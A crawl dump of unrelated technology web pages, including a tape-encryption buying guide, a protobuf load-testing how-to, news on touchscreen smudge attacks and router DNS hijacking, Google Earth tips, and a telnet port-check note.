will continue doing what we have done for the past 29 years: talk about technology and contribute to ultimately making the human species smarter. You are welcome. Greg Crowe is a former GCN staff writer who covered mobile technology.
<urn:uuid:55c225fa-7b77-4459-9a40-62f62dba8ada>
CC-MAIN-2017-09
https://gcn.com/articles/2011/06/27/talking-about-technology-makes-you-smarter.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963469
522
2.734375
3
Best Practices for choosing and implementing a storage encryption solution Once you decide that a solution is required in order to meet regulatory or good business governance requirements you must choose between a single platform or a corporate-wide solution. It is usually better to standardize on one solution for all platforms. Next you must determine which option is best for your environment - software-only or hardware. Software often does not offer compression. Hardware units—whether built into the drive or of an inline design—use hardware compression prior to encryption. Software compression relies upon the system processing power to do the work. Hardware compression is not system-reliant. Software normally involves several updates during the life of the system. Hardware does not change even if the complete system or OS is changed. Software encryption is not available for all systems. Hardware encryption works on all system types. Some backup packages do not include encryption and therefore require a change of package. Hardware encryption works on all backup solution packages without the need for any configuration changes. With software, the user key is kept on the system, so the system or network is open to attack. With hardware tape encryption, the key can be kept in the device and so cannot be read from any external device. Software is normally restricted to a single operating system type. Hardware is system-independent. Software encryption usually needs to be upgraded when the OS is upgraded. Hardware, being platform-independent, does not need to be changed when the OS is upgraded. Software is often a low cost solution, and dependent on the OS being used. Hardware is normally the same cost whatever the OS. Software costs are often based on the capacity of the attached library. Hardware costs are fixed. What to Encrypt? Another issue raised is whether to encrypt only the sensitive data or to encrypt everything. The concept of encrypting only the sensitive data appears to be very attractive because it minimizes the amount of extra processing. The downside is that someone has to make the decision as to what is sensitive and what is not. Another area of contention is when to implement a solution. Should you look at what is readily available and “field proven” or wait for the availability of the “ultimate solution” real soon? From the beginning, it should be understood that there may be individuals within the business who will not understand the risks and will fight against any attempts to integrate a solution into the infrastructure. Many MIS departments see backup as non-productive. Another potential issue is the funding for this solution. A vital point to consider is what to do with the existing pool of tapes used for backups and archives. Is it possible to reuse the existing media? Does the solution require continual monitoring and operational input? Does your solution take into consideration migration to a new system? An external hardware solution with dedicated compression and encryption engines will not suffer from the problems and complexities that software may suffer from. The DR Implications Any good tape encryption solution must be such that it does not hinder or overcomplicate this already stressful operation. Statistics show that if you fail to restore your business data and get your business back up in a timely manner, the result 80% of the time is the total collapse of your business. 
Be cautious about choosing a solution that is over-complex, needs specialists to install at the DR site, or has a difficult key-management system. Where Should a Hardware Solution Reside? In the Server When encryption is built into the server, it is system-dependent and very disruptive to install. The downside is that it must also reside in any DR or development systems before it can be used there. With host-based encryption using a standard encryption card, any user who has implemented the same methodology will have exactly the same physical hardware as you. In the Drive There are only a limited number of truly integrated drive-based solutions on the market, and these are new and, so far, unproven. Most require a new media type in order to allow encryption. Because the drives themselves are standard and the whole system's security rests on a single external key, key management for such a product is of paramount importance. With drive-based encryption using a standard encryption card, any user will have exactly the same physical hardware as you. In an Inline Appliance These devices are normally the simplest to install and cause the least disruption. The keys can be securely loaded into the appliance, which needs no network connection to the system and so is inherently more secure. These systems are transparent, and drives can be rolled out across a heterogeneous environment very easily. These solutions also offer the easiest use in a DR situation. Encryption is the best way for businesses to meet the increasing need for privacy protection. 10ZiG offers two storage security solutions to protect your data at rest. The Q3 is a stand-alone storage encryption appliance. The Q3i is a tape drive with built-in PCI compliant encryption. For more details, visit www.theq3.com or contact 10ZiG at email@example.com. Contact us at 866-865-5250 for a free 30-day trial or for more information.
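As an illustration of the software route discussed above, here is a minimal sketch (not a recommendation of any particular product) of why a software backup pipeline should compress before it encrypts: well-encrypted output is statistically random and will no longer compress. It assumes Python with the third-party cryptography package, and the file name is hypothetical.

import zlib
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # in practice the key lives in a key manager, never with the media
fernet = Fernet(key)

def protect(raw: bytes) -> bytes:
    compressed = zlib.compress(raw, level=9)  # compress first; ciphertext would not compress
    return fernet.encrypt(compressed)

def restore(blob: bytes) -> bytes:
    return zlib.decompress(fernet.decrypt(blob))

with open("payroll.db", "rb") as f:           # hypothetical file to back up
    original = f.read()
backup = protect(original)
assert restore(backup) == original

A hardware appliance performs the same two steps in dedicated engines, which is why it also places compression ahead of encryption.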
<urn:uuid:9a26d62f-c64e-42fe-b842-95ec8ebab72b>
CC-MAIN-2017-09
http://www.10zig.com/choosingencryption.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171933.81/warc/CC-MAIN-20170219104611-00376-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927772
1,091
2.625
3
Web and cloud applications need more than just good programming to run: The server infrastructure needs to have enough resources to handle the requests of every concurrent user. Inadequate infrastructure can lead to sluggish performance—or even total failure, if too many users push data at the same time. Load testing is a process that involves running virtual users against an application to determine if it performs efficiently under a given workload and gauge the maximum number of users it can simultaneously support. ZebraTester is a toolkit built to perform load tests and interpret the results. The ZebraTester program utilizes Google’s Protocol Buffers, or protobuf, to serialize data for efficient transfers during the load testing process. Protobuf stores data like XML and JSON do, but with one key difference: serialized protobuf messages carry no field names or data type information. They move only the raw values and rely on the message definition to re-assign those values to the right fields when received. FileDescriptorSets, or .desc files, are used to match the data with the designated fields. ZebraTester then interprets this data in a human-readable way. Automatic Protobuf Message Detection ZebraTester automatically examines all recorded data from load tests to determine if it includes protobuf data. The program intuitively examines the HTTP requests and responses for matching text fragments containing the string “protobuf” in the “Content-Type” header field, and produces a warning message if any information is missing or incorrectly assigned. Loading the FileDescriptorSet The previously mentioned .desc files are an essential part of the testing process, as ZebraTester requires this information to produce human-interpretable test results. Running a test requires supplying the transmitted data’s compatible .desc file. Testers can generate the .desc file from the source .proto file via a protoc compiler using the following command structure: protoc --descriptor_set_out=filename.desc filename.proto The application development team can provide the testing team with the correct .proto file for the test. Assign the .desc file in ZebraTester by copying it to your local machine and registering it as an “External Resource” via the “Declare External Resources” menu. Configure the Message Type The program uses the .desc file to display the transferred data with the relevant field title and related information, but requires configuration to enable this functionality. When this feature is enabled, it’s easy to extract and assign variables and values in the transmitted messages. You can configure the message type by going to the main menu, selecting the link on “Configure the Message Type for all G-PROTOBUF Requests and Responses,” and clicking the magnifying glass for “HTTP Request” or “HTTP Response” under the “Message Type” column. From here the tester can select the message type from the menu or select the question mark icon to automatically assign the type (if the tester does not know the correct value). Extracting and Assigning Variables Testers can adjust message field information in ZebraTester as long as the .desc file and message type values are properly configured. To adjust values, select the “PROT” icon from either the “Request” or “Response” content window on the “URL Details / Var Handler” page. This will display a list of editable values with the relevant field names and data types in a table. 
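To make the role of the .desc file concrete, here is a rough sketch of how raw protobuf bytes can be turned back into named fields outside of ZebraTester, using the Python protobuf package. The function and message names are illustrative only, and the exact factory API differs slightly between protobuf releases (newer versions expose message_factory.GetMessageClass instead of MessageFactory).

from google.protobuf import descriptor_pb2, descriptor_pool, message_factory

def decode_payload(desc_path, message_type, raw_bytes):
    # Load the FileDescriptorSet produced by:
    #   protoc --descriptor_set_out=filename.desc filename.proto
    fds = descriptor_pb2.FileDescriptorSet()
    with open(desc_path, "rb") as f:
        fds.ParseFromString(f.read())

    # Register every file descriptor in a pool so message types can be found by name.
    pool = descriptor_pool.DescriptorPool()
    for file_proto in fds.file:
        pool.Add(file_proto)

    # Build a message class for the configured type and parse the raw payload.
    descriptor = pool.FindMessageTypeByName(message_type)
    message_class = message_factory.MessageFactory(pool).GetPrototype(descriptor)
    message = message_class()
    message.ParseFromString(raw_bytes)
    return message  # fields are now addressable by name, as in ZebraTester's table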
Running the Load Tests ZebraTester executes the load test in the same way whether or not any protobuf values have been changed. The program automatically combines all the required resources in a ZIP archive and distributes them to the load generators. For more information on configuring and executing protobuf load tests with ZebraTester, check out the full guide here.
<urn:uuid:853de615-f076-4cce-bb29-94cd9ccc47f4>
CC-MAIN-2017-09
https://www.apicasystem.com/blog/configuring-and-adjusting-google-protocol-buffer-load-tests/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00496-ip-10-171-10-108.ec2.internal.warc.gz
en
0.78936
826
2.625
3
Hashemian H.M.,AMS Corporation Progress in Nuclear Energy | Year: 2011 The nuclear power industry is working to reduce generation costs by adopting condition-based maintenance strategies and automating testing activities. These developments have stimulated great interest in on-line monitoring (OLM) technologies and new diagnostic and prognostic methods to anticipate, identify, and resolve equipment and process problems and ensure plant safety, efficiency, and immunity to accidents. This paper provides examples of these technologies with particular emphasis on eight key OLM applications: detecting sensing-line blockages, testing the response time of pressure transmitters, monitoring the calibration of pressure transmitters on-line, cross-calibrating temperature sensors in situ, assessing equipment condition, performing predictive maintenance of reactor internals, monitoring fluid flow, and extending the life of neutron detectors. These applications are discussed in the following sections. Emphasis is placed on the principles of a core OLM method - noise analysis - and the technical requirements for an integrated OLM system are summarized. © 2010 Elsevier Ltd. All rights reserved. Source Hashemian H.M.,AMS Corporation IEEE Transactions on Instrumentation and Measurement | Year: 2011 Condition-based maintenance techniques for industrial equipment and processes are described in this paper together with examples of their use and discussion of their benefits. These techniques are divided here into three categories. The first category uses signals from existing process sensors, such as resistance temperature detectors (RTDs), thermocouples, or pressure transmitters, to help verify the performance of the sensors and process-to-sensor interfaces and also to identify problems in the process. The second category depends on signals from test sensors (e.g., accelerometers) that are installed on plant equipment (e.g., rotating machinery) in order to measure such parameters as vibration amplitude. The vibration amplitude is then trended to identify the onset of degradation or failure. This second category also includes the use of wireless sensors to provide additional points for collection of data or allow plants to measure multiple parameters to cover not only vibration amplitude but also ambient temperature, pressure, humidity, etc. With each additional parameter that can be measured and correlated with equipment condition, the diagnostic capabilities of the category can increase exponentially. The first and second categories just mentioned are passive, which means that they do not involve any perturbation of the equipment or the process being monitored. In contrast, the third category is active. That is, the third category involves injecting a test signal into the equipment (sensors, cables, etc.) to measure its response and thereby diagnose its performance. For example, the response time of temperature sensors (RTDs and thermocouples) can be measured by the application of the step current signal to the sensor and analysis of the sensor response to the application of the step current. Cable anomalies can be located by a similar procedure referred to as the time domain reflectometry (TDR). This test involves a signal that is sent through the cable to the end device. Its reflection is then recorded and compared to a baseline to identify impedance changes along the cable and thereby identify and locate anomalies. 
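As a toy illustration of the reflectometry arithmetic described above (not AMS Corporation's method), the distance to an impedance change follows directly from the round-trip delay of the reflected pulse and the cable's velocity of propagation. The Python sketch below assumes a typical coaxial velocity factor of about 0.66.

C = 299_792_458.0  # speed of light in vacuum, m/s

def fault_distance_m(round_trip_seconds, velocity_of_propagation=0.66):
    # Divide by two because the pulse travels to the anomaly and back.
    return round_trip_seconds * velocity_of_propagation * C / 2.0

print(f"{fault_distance_m(1.2e-6):.1f} m")  # a 1.2 microsecond echo is roughly 119 m away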
Combined with measurement of cable inductance (L), capacitance (C), and loop resistance (R), or LCR testing, the TDR method can identify and locate anomalies along a cable, identify moisture in a cable or end device, and even reveal gross problems in the cable insulation material. There are also frequency domain reflectometry (FDR) methods, reverse TDR, trending of insulation resistance (IR) measurement, and other techniques which can be used in addition to or instead of TDR and LCR to provide a wide spectrum of tools for cable condition monitoring. The three categories of techniques described in this paper are the subject of current research and development projects conducted by the author and his colleagues at the AMS Corporation with funding from the U.S. Department of Energy (DOE) under the Small Business Innovation Research (SBIR) program. © 2010 IEEE. Source AMS Corporation | Date: 2015-06-22 A drug delivery system that can be deployed from a catheter and retained within the bladder for delivery of treatment drug solutions over a period of time. The delivery system includes an inflatable or expandable delivery element that can be collapsed within the catheter tip for navigation into the bladder before being inflated or expanded within the bladder. The inflated or expanded delivery element can engage the bladder walls or sized to be too large to be passed from the bladder such that the delivery element is retained within the bladder after inflation or expansion to administer a treatment drug solution over an extended period of time. AMS Corporation | Date: 2015-02-20 Apparatus and methods are provided for treating urinary incontinence, fecal incontinence, and other pelvic defects or dysfunctions, in both males and females, using one or more lateral implants to reinforce the supportive tissue of the urethra. The implants are configured to engage and pull (e.g., pull up) pelvic tissue to cause the lateral sub-urethral tissue, such as the endopelvic fascia, to tighten and provide slack reduction for improved support. As such, certain embodiments of the implants can be utilized to eliminate the need for mesh or other supportive structures under the urethra that is common with other incontinence slings. AMS Corporation | Date: 2015-01-27 Described are devices and methods related to the needleless injection of fluid into tissue of the lower urinary tract, such as the urethra and prostate.
<urn:uuid:ec3cbbb6-edc8-4172-8dad-14241f96344b>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/ams-corporation-148336/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00372-ip-10-171-10-108.ec2.internal.warc.gz
en
0.913464
1,130
2.734375
3
Touchscreen Smudges Pose Security Risk
Residual fingerprint oils on smartphones, ATMs, and other devices may reveal passwords and other confidential data, find security researchers. Prepare for a new mobile security threat: smudges. Or to be more precise, the oily residue left behind by fingers on your iPhone, Android, BlackBerry, or other touchscreen mobile device may help an attacker deduce your password. That's the message from researchers at the University of Pennsylvania, who presented a paper at this week's Usenix conference analyzing "Smudge Attacks on Smartphone Touch Screens." Based on their results, "the practice of entering sensitive information via touchscreens needs careful analysis," said the researchers. "The Android password pattern, in particular, should be strengthened." But they cautioned that any touchscreen device, including ATMs, voting machines, and PIN entry devices in retail stores, could be susceptible to smudge attacks. Touchscreens, of course, are an increasingly common feature of mobile computing devices. According to Gartner Group, 363 million touchscreen mobile devices will be sold in 2010, an increase of 97% over last year's sales. But are passwords entered via touchscreens secure? To find out, the researchers studied two different Android smartphones, the HTC G1 and the HTC Nexus1, evaluating different photography techniques for discerning a smudge pattern. With the best setup, they saw a complete smudge pattern two-thirds of the time, and could partially identify one 96% of the time. Furthermore, in ideal conditions -- say, if an attacker had physical possession of the device -- the researchers could oftentimes see finger-stroke directionality too, meaning that "the order of the strokes can be learned, and consequently, the precise patterns can be determined," they said. While Android 2.2 adds an option for alphanumeric passwords, the team tested the numbers-only password protocol, which uses a virtual nine-digit keypad and imposes certain restrictions on repeat "contact points," as well as swipe patterns. The researchers note that numeric passwords are likely to remain the norm, especially for power users who must continuously "swipe in" to their device. Given the contact point restrictions, the researchers found that "the password space of the Android password pattern contains 389,112 possible patterns." But an attacker will face a lockout -- typically, 30 seconds in duration -- after inputting an incorrect password. That would make manually entering too many passwords laborious. But by comparing smudge patterns with a dictionary of common patterns, an attacker might significantly reduce the password space. Thankfully, there's a failsafe on Android phones, since after 20 failed password attempts, a user must enter his or her Google username and password to authenticate. The good news is that for now, even with a smudge attack, an attacker typically wouldn't be able to reduce the password space to 20 or fewer possibilities. But going forward, don't rule out the possibility that enterprising attackers may add on additional techniques to help see through smudges.
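For readers who want to check the researchers' password-space figure, a brute-force count of valid 3x3 Android unlock patterns is short enough to sketch in Python. Points are numbered 0 through 8, patterns use four to nine distinct points, and a stroke may only pass over a point that has already been visited; the count below reproduces the 389,112 figure.

CROSSED = {}
for a, b, mid in [(0, 2, 1), (3, 5, 4), (6, 8, 7),   # horizontal lines
                  (0, 6, 3), (1, 7, 4), (2, 8, 5),   # vertical lines
                  (0, 8, 4), (2, 6, 4)]:             # diagonals through the center
    CROSSED[(a, b)] = CROSSED[(b, a)] = mid

def count(path, visited):
    total = 1 if len(path) >= 4 else 0               # patterns must use 4 to 9 points
    for nxt in range(9):
        if nxt in visited:
            continue
        mid = CROSSED.get((path[-1], nxt))
        if mid is not None and mid not in visited:
            continue                                  # stroke would skip an unused point
        total += count(path + [nxt], visited | {nxt})
    return total

print(sum(count([start], {start}) for start in range(9)))   # prints 389112

A smudge that reveals even part of the pattern, or the direction of the strokes, prunes this space dramatically, which is the heart of the researchers' concern.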
<urn:uuid:68ea7a92-f0f5-4227-baed-3d64752c44f8>
CC-MAIN-2017-09
http://www.darkreading.com/vulnerabilities-and-threats/touchscreen-smudges-pose-security-risk/d/d-id/1091543
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00548-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927825
622
2.625
3
Cybercriminals have developed a Web-based attack tool to hijack routers on a large scale when users visit compromised websites or view malicious advertisements in their browsers. The goal of these attacks is to replace the DNS (Domain Name System) servers configured on routers with rogue ones controlled by attackers. This allows hackers to intercept traffic, spoof websites, hijack search queries, inject rogue ads on Web pages and more. The DNS is like the Internet’s phonebook and plays a critical role. It translates domain names, which are easy for people to remember, into numerical IP (Internet Protocol) addresses that computers need to know to communicate with each other. The DNS works in a hierarchical manner. When a user types a website’s name in a browser, the browser asks the operating system for that website’s IP address. The OS then asks the local router, which then queries the DNS servers configured on it—typically servers run by the ISP. The chain continues until the request reaches the authoritative server for the domain name in question or until a server provides that information from its cache. If attackers insert themselves in this process at any point, they can respond with a rogue IP address. This will trick the browser to look for the website on a different server; one that could, for example, host a fake version designed to steal the user’s credentials. An independent security researcher known online as Kafeine recently observed drive-by attacks launched from compromised websites that redirected users to an unusual Web-based exploit kit that was specifically designed to compromise routers. The vast majority of exploit kits sold on underground markets and used by cybercriminals target vulnerabilities in outdated browser plug-ins like Flash Player, Java, Adobe Reader or Silverlight. Their goal is to install malware on computers that don’t have the latest patches for popular software. The attacks typically work like this: Malicious code injected into compromised websites or included in rogue ads automatically redirect users’ browsers to an attack server that determines their OS, IP address, geographical location, browser type, installed plug-ins and other technical details. Based on those attributes the server then selects and launches the exploits from its arsenal that are most likely to succeed. The attacks observed by Kafeine were different. Google Chrome users were redirected to a malicious server that loaded code designed to determine the router models used by those users and to replace the DNS servers configured on the devices. Many users assume that if their routers are not set up for remote management, hackers can’t exploit vulnerabilities in their Web-based administration interfaces from the Internet, because such interfaces are only accessible from inside the local area networks. That’s false. Such attacks are possible through a technique called cross-site request forgery (CSRF) that allows a malicious website to force a user’s browser to execute rogue actions on a different website. The target website can be a router’s administration interface that’s only accessible via the local network. Many websites on the Internet have implemented defenses against CSRF, but routers generally lack such protection. 
The new drive-by exploit kit found by Kafeine uses CSRF to detect over 40 router models from a variety of vendors, including Asustek Computer, Belkin, D-Link, Edimax Technology, Linksys, Medialink, Microsoft, Netgear, Shenzhen Tenda Technology, TP-Link Technologies, Netis Systems, Trendnet, ZyXEL Communications and HooToo. Depending on the detected model, the attack tool tries to change the router’s DNS settings by exploiting known command injection vulnerabilities or by using common administrative credentials. It uses CSRF for this as well. If the attack is successful, the router’s primary DNS server is set to one controlled by attackers and the secondary one, which is used as a failover, is set to Google’s public DNS server. In this way, if the malicious server temporarily goes down, the router will still have a perfectly functional DNS server to resolve queries and its owner will have no reason to become suspicious and reconfigure the device. According to Kafeine, one of the vulnerabilities exploited by this attack affects routers from multiple vendors and was disclosed in February. Some vendors have released firmware updates, but the number of routers updated over the past few months is probably very low, Kafeine said. The vast majority of routers need to be updated manually through a process that requires some technical skill. That’s why many of them never get updated by their owners. Attackers know this too. In fact, some of the other vulnerabilities targeted by this exploit kit include one from 2008 and one from 2013. The attack seems to have been executed on a large scale. According to Kafeine, during the first week of May the attack server got around 250,000 unique visitors a day, with a spike to almost 1 million visitors on May 9. The most impacted countries were the U.S., Russia, Australia, Brazil and India, but the traffic distribution was more or less global. To protect themselves, users should check manufacturers’ websites periodically for firmware updates for their router models and should install them, especially if they contain security fixes. If the router allows it, they should also restrict access to the administration interface to an IP address that no device normally uses, but which they can manually assign to their computer when they need to make changes to the router’s settings.
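Beyond firmware updates, a cautious user can also periodically compare what the router's resolver returns against a trusted public resolver. The sketch below assumes Python with the third-party dnspython package; a persistent mismatch is only a hint worth investigating, since CDNs legitimately serve different answers from different vantage points.

import dns.resolver  # pip install dnspython

def answers(name, nameserver=None):
    resolver = dns.resolver.Resolver()           # defaults to the system-configured resolver
    if nameserver:
        resolver.nameservers = [nameserver]
    return sorted(rr.to_text() for rr in resolver.resolve(name, "A"))

local = answers("example.com")                   # whatever the router/ISP hands back
trusted = answers("example.com", "8.8.8.8")      # Google Public DNS as a reference
if local != trusted:
    print("Resolvers disagree; check the router's DNS settings:", local, "vs", trusted)
else:
    print("Answers match:", local)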
<urn:uuid:e6f546e7-789b-411f-bb8e-dfe214c79ba4>
CC-MAIN-2017-09
http://www.itnews.com/article/2926316/large-scale-attack-hijacks-routers-through-users-browsers.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00017-ip-10-171-10-108.ec2.internal.warc.gz
en
0.933313
1,124
2.859375
3
Guide the user Interaction design takes users through a set of actions, gives reward and guides them to next steps. Inform and delight Help users feel smart. Engage them in moments of inspiration and curiosity. Design for enlightening experiences that encourage critical thinking and creative confidence. Be mindful of what users need by providing them the right tools at the right time. Be contextually aware Users move between environments (office, car, home, soccer game) and activities (walking, waiting in line, sitting, meeting) many times a day. Their changing circumstances create new contexts designers must assess and design for on a moment-to-moment basis. Design for the most desirable outcomes while keeping the shifting factors of users’ working lives in mind. Make it obvious Build on people’s existing mental models to inform interactions. Familiarity and clear, distinct choices minimize the cognitive load and enable people to concentrate on their goals. Design the “next most important action” to be inherently identifiable and easily understood based on its context with the immediate task at hand. For our users Interaction Designer Kelly Bailey talks about how the IBM Design Language gives her the freedom to focus on the big picture and the needs of her users.
<urn:uuid:ca0a4f3a-0b8a-40e4-bbb3-36fbe6a2f45b>
CC-MAIN-2017-09
https://www.ibm.com/design/language/experience/interaction/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00369-ip-10-171-10-108.ec2.internal.warc.gz
en
0.906676
256
2.671875
3
U.S. Military Robots Of The Future: Visual Tour
Meet robots that fight fires, climb ladders, search for bombs, and race across the battlefield. The technological singularity is near, say military strategists. Cockroaches have a reputation for being indestructible. That could explain DASH (Dynamic Autonomous Sprawled Hexapod), a cockroach-like robot developed by the Biomimetic Millisystems Lab at the University of California, Berkeley. DASH is small (10 cm) but fast (15 body lengths per second) and resilient (it can survive ground impact of 10 meters per second). Besides the creepiness factor, the crawling robots might be used as nodes on a dispersed network. Image credit: UC Berkeley
<urn:uuid:57d05500-893d-4329-8d01-f3722c623c58>
CC-MAIN-2017-09
http://www.darkreading.com/risk-management/us-military-robots-of-the-future-visual-tour/d/d-id/1104038?page_number=11
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00545-ip-10-171-10-108.ec2.internal.warc.gz
en
0.795452
244
2.703125
3
Google Earth users can do more than just fly around a virtual globe. The free mapping application can display real-time weather, help compose photographs and measure distances much more easily than its Maps cousin. To see a video version of this how-to, watch a video on YouTube. In a recent update, Google provided 3D building information for many cities. The option can be turned on in the layers panel in the bottom left corner. Sometimes the 3D information will take longer to load and render depending on connectivity. One of the useful features of the application allows photographers to see the position and strength of the sun. Click on the sun icon in the top toolbar and use the slider to change the date and time. Users can see the sun move across the sky and cast shadows on the landscape. Clicking on the wrench icon in the slider panel allows users to set the date and time, which is sometimes more efficient than using the slider. The tool doesn't account for weather, but can be useful to plan photo shoots or other activities dependent on daylight. By clicking on the clock icon users can view archived map data from decades ago. Some areas will have more archived images than others and most images in the 1990s are in black and white and are low quality. Measuring distances can be done by clicking on the ruler in the top toolbar and clicking point to point. Units of measure can be changed in the box that appears when the ruler is selected.
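For the curious, the ruler tool is essentially computing great-circle distance between the points you click. A rough sketch of that math in Python, using the haversine formula and a spherical-Earth approximation (real geodesic calculations are slightly more precise):

from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    # Convert to radians, then apply the haversine formula on a sphere of radius 6371 km.
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))

print(round(haversine_km(37.7749, -122.4194, 34.0522, -118.2437)))  # San Francisco to Los Angeles, ~559 km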
<urn:uuid:8b70b427-5cee-46ef-8de3-71182fa78667>
CC-MAIN-2017-09
http://www.networkworld.com/article/2167580/applications/google-earth-power-user-tips.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905948
296
2.609375
3
With the "telnet" command you can test if a port is open
You can check whether a port in your network is open by issuing the telnet command: telnet [domainname or ip] [port] - [domainname or ip] is the domain name or IP address of the server to which you are trying to connect - [port] is the port number where the server is listening If the port is open, you will see a blank screen after issuing the command, which means the connection was successful. Example: telnet rpc.acronis.com 443 (!) In Windows Vista and Windows 7 you may need to enable telnet first: - Go to Start -> Control Panel -> Programs; - Under Programs and features, click Turn Windows features on or off; - Mark Telnet Client (Telnet Server is not needed for this check); - Click OK. If backup to Acronis Cloud is failing, use the Acronis Cloud Connection Verification Tool to check the connection.
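If telnet is not available (it is an optional feature that ships disabled on newer Windows releases), the same check can be scripted. A minimal Python sketch using only the standard library:

import socket

def port_is_open(host, port, timeout=5.0):
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(port_is_open("rpc.acronis.com", 443))  # True means the TCP connection succeeded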
<urn:uuid:22bea1dd-b373-44a4-ac6e-84e17dfd3428>
CC-MAIN-2017-09
https://kb.acronis.com/content/7503
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.830417
236
2.53125
3
Common Networking Standards and Why They Are Relevant Often, we don't have time to learn the reasons behind the standards we use. But learning what instigated a standard goes a long way toward not only understanding its importance, but also more easily and effectively applying it in your workplace. In this hour-long webinar, Global Knowledge instructor Keith Sorn will discuss common networking standards and explain how they were determined and why they are relevant. He will fill you in on things like why it's important to use proper color-coding standards when making cables and why the length limitations on wired cable are essential. He will also explain new standards, such as power over fiber. Keith is a computational physicist working in the IT field who splits his time between teaching at Global Knowledge and consulting. Keith teaches courses on UNIX/Linux (including writing of the kernel), programming, security and networking. He has worked with numerous and varied clients, including Lawrence Livermore National Laboratory, DoD, IBM, UNISYS and Lockheed, and he enjoys programming, penetration testing and his family life. - Why STP and UTP are twisted - Why we have five classes of addresses - Why we have an ISO OSI networking model - Why you need to know subnetting (a short worked example follows below)
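A short worked example for that last bullet: Python's standard ipaddress module makes the arithmetic behind subnetting concrete (the prefix shown is an arbitrary example).

import ipaddress

net = ipaddress.ip_network("192.168.10.0/26")
print(net.netmask)                    # 255.255.255.192
print(net.num_addresses - 2)          # 62 usable host addresses
print(list(net.hosts())[:3])          # first few usable addresses
for subnet in net.subnets(prefixlen_diff=1):
    print(subnet)                     # the two /27s this block splits into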
<urn:uuid:179bd45a-2751-495f-9452-a2b70251a4ea>
CC-MAIN-2017-09
https://www.globalknowledge.com/ca-en/resources/resource-library/recorded-webinar/common-networking-standards-and-why-they-are-relevant/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963944
260
2.671875
3
Zhao B.,Zhejiang University | Yang S.,Northeast Dianli University | Zhang G.,Beifang Combined Electrical Power Co. | Zhang H.,Beifang Combined Electrical Power Co. | And 6 more authors. Zhongguo Dianji Gongcheng Xuebao/Proceedings of the Chinese Society of Electrical Engineering | Year: 2013 Direct air cooling (DAC) systems have been widely applied in coal-fired power plants because they save 69%~84% of cooling water. However, in arid regions with heavy sandstorms, ash fouling of the air cooled condenser (ACC) can raise the steam turbine's exhaust pressure by 8 kPa or more. If the fouling is not cleaned promptly, the unit's coal consumption rises by 10~15 g/(kW·h) or more and pollutant emissions increase as well, yet the water available for timely cleaning is restricted by local environmental conditions. To resolve this conflict, this paper presents a novel compressed air blower (CAB) system designed to clean ash fouling from the ACC; compressed air entirely replaces desalted water as the cleaning medium. The paper covers the basic components of the CAB system, the content and results of a site simulation test (SST) of the CAB under multiple operating conditions on the ACC of a 600 MW DAC unit, the proposed blowing evaluation indexes, the quantitative correlation between ash fouling resistance and exhaust pressure obtained from the SST data, and a comparison of the accumulated cleaning effects of compressed air blowing and water washing over the same cleaning period. The SST results show that the CAB system saves 1.47 kg/m2 of water per year, reduces the accumulated average exhaust pressure of the steam turbine by 1.7 kPa, and cuts coal consumption by 2.5 g/(kW·h) compared with water washing. In other words, the CAB system achieves three goals at once: water saving, energy saving and emission reduction. © 2013 Chinese Society for Electrical Engineering. Source
<urn:uuid:9bfc23fd-0b3c-4f23-a26b-22db6fff47f2>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/beifang-combined-electrical-power-co-1266441/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00245-ip-10-171-10-108.ec2.internal.warc.gz
en
0.923346
447
2.671875
3
The network is the computer" - at least, it is according to Sun Microsystems. Sun's John Gage coined that phrase two decades ago, which was, in hindsight, about 20 years ahead of its time. Today, breakthrough innovations, such as distributing unused computing power to create a virtual supercomputer, are steadily transforming Gage's vision into reality. There's a lot to look forward to on the horizon. Cloud computing might be the next step in the Internet's evolution. Advances in fields like nanotechnology are enabling robots to become truly ubiquitous; they may even be surprisingly helpful to government agencies confronting the baby boomer retirement wave. And at last, the keyboard and mouse may finally be on their way out - if Microsoft's new hands-on interface is the next big thing. Technology is always on the march. Here's a look at where some of it is headed. Intuitive Interface: The Power of Touch It's pretty ridiculous that we still use keyboards. It's kind of like trying to fly an F-22 fighter jet with the controls used by the Red Baron. Keyboards are unfriendly and unintuitive. But for more than a century, nobody has come up with a seriously viable alternative - until now. When Microsoft Surface debuted last year, it represented the first significant move toward a more immersive style of interface. Gone are keyboards and mice; a touch-sensitive screen replaces them. Commands are executed by touching, objects are moved by dragging and art is made by digital finger-painting. Surface's guts aren't all that impressive - a PC running Windows 